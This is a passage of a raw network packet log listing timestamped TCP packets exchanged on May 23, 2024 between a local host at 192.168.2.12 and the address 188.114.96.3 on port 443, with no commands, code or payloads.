                May 23, 2024 18:26:43.070766926 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.070872068 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.070890903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.070935965 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.071427107 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.071446896 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.071505070 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.071511984 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.071549892 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.072102070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.072120905 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.072171926 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.072177887 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.072213888 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.075388908 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.075411081 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.075670004 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.075678110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.075721979 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.077769041 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.077790976 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.077850103 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.077856064 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.077892065 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.078424931 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.078443050 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.078501940 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.078507900 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.078543901 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.086015940 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.086064100 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.086112976 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.086144924 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.086148977 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.086168051 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.086185932 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.086218119 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.161617994 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.161640882 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.161765099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.161791086 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.161829948 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.165797949 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.165817022 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.165894985 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.165899992 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.165942907 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.166471004 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.166495085 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.166531086 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.166536093 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.166567087 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.166591883 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.168814898 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.168833017 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.168906927 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.168915987 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.168960094 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.170124054 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.170140028 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.170197010 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.170206070 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.170253992 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.172667027 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.172688961 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.172743082 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.172753096 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.172775984 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.172791004 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.175141096 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.175158978 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.175198078 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.175205946 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.175230026 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.175256968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.179054022 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.179071903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.179145098 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.179148912 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.179187059 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.255235910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.255259991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.255383968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.255393028 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.255435944 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.409688950 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.409723997 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.409895897 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.409921885 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.409970999 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.450572014 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.450604916 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.450661898 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.450690031 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.450706959 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.450735092 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.482525110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.482561111 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.482758999 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.482786894 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.482836008 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.509571075 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.509603977 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.509660959 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.509704113 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.509706974 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.509747982 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.530296087 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.530335903 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.530457020 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.530495882 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.530546904 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.547602892 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.547640085 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.547686100 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.547722101 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.547738075 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.547765017 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.561845064 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.561873913 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.561968088 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.561980963 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.562024117 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.578619003 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.578655958 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.578783035 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.578797102 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.578835011 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.588561058 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.588603973 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.588696003 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.588712931 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.588732958 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.588751078 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.597194910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.597214937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.597295046 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.597325087 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.597343922 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.597368956 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.605051994 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.605073929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.605164051 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.605181932 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.605222940 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.611613035 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.611638069 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.611803055 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.611814976 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.611860037 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.617501974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.617525101 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.617671013 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.617679119 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.617721081 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.622771978 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.622802019 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.622899055 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.622925997 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.622977972 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.627893925 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.627921104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.628005028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.628021955 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.628062010 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.631498098 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.631534100 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.631575108 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.631587982 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.631602049 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.631620884 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.636218071 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.636249065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.636317968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.636342049 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.636356115 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.636379004 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.639900923 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.639920950 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.640005112 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.640028954 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.640069008 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.643102884 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.643165112 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.643199921 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.643217087 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.643230915 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.643254995 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.646074057 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.646106958 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.646158934 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.646188021 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.646202087 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.646224022 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.649136066 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.649166107 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.649244070 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.649267912 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.649306059 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.651818991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.651843071 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.651901007 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.651917934 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.651956081 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.654498100 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.654524088 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.654597044 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.654606104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.654643059 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.657031059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.657056093 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.657126904 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.657150984 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.657196999 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.659426928 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.659455061 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.659496069 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.659518957 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.659534931 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.659558058 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.661889076 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.661916018 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.661969900 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.661988974 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.662138939 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.663722038 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.663746119 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.663784027 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.663799047 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.663825035 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.663842916 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.666347027 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.666369915 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.666429043 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.666450977 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.666498899 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.668040991 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.668070078 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.668102026 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.668121099 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.668144941 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.668168068 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.669646978 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.669670105 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.669703960 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.669717073 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.669737101 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.669754982 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.671539068 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.671566963 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.671601057 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.671608925 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.671636105 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.671648979 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.673343897 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.673372030 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.673438072 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.673445940 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.673481941 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.675108910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.675139904 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.675169945 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.675194979 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.675214052 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.675231934 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.676976919 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.677005053 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.677051067 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.677072048 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.677092075 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.677115917 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.678951979 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.678978920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.679013968 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.679033995 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.679054976 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.679073095 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.680681944 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.680708885 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.680744886 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.680767059 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.680784941 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.680814028 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.681659937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.681682110 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.681725979 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.681736946 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.681750059 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.681783915 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.683448076 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.683476925 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.683512926 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.683530092 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.683542967 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.683573961 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.684463978 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.684485912 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.684520006 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.684534073 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.684551001 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.684576988 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.714258909 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.714298010 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.714345932 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.714374065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.714394093 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.714415073 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.716344118 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.716370106 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.716411114 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.716423035 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.716448069 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.716468096 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.718226910 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.718252897 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.718290091 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.718300104 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.718322039 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.718343019 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.720524073 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.720550060 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.720596075 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.720603943 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.720638037 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.720655918 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.723156929 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.723203897 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.723233938 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.723239899 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.723273993 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.723282099 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.724875927 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.724925995 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.724956036 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.724980116 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.724993944 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.725018978 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.727256060 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.727307081 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.727360964 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.727379084 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.727397919 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.727411985 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.729022026 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.729084015 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.729109049 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.729115963 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.729149103 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.729168892 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.806082010 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.806114912 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.806258917 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.806279898 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.806319952 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.807420015 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.807446003 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.807517052 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.807527065 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.807566881 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.809550047 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.809576035 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.809686899 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.809701920 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.809777021 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.811534882 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.811563969 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.811606884 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.811618090 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.811634064 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.811654091 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.814146042 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.814173937 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.814214945 CEST49721443192.168.2.12188.114.96.3
                May 23, 2024 18:26:43.814222097 CEST44349721188.114.96.3192.168.2.12
                May 23, 2024 18:26:43.814238071 CEST49721443192.168.2.12188.114.96.3
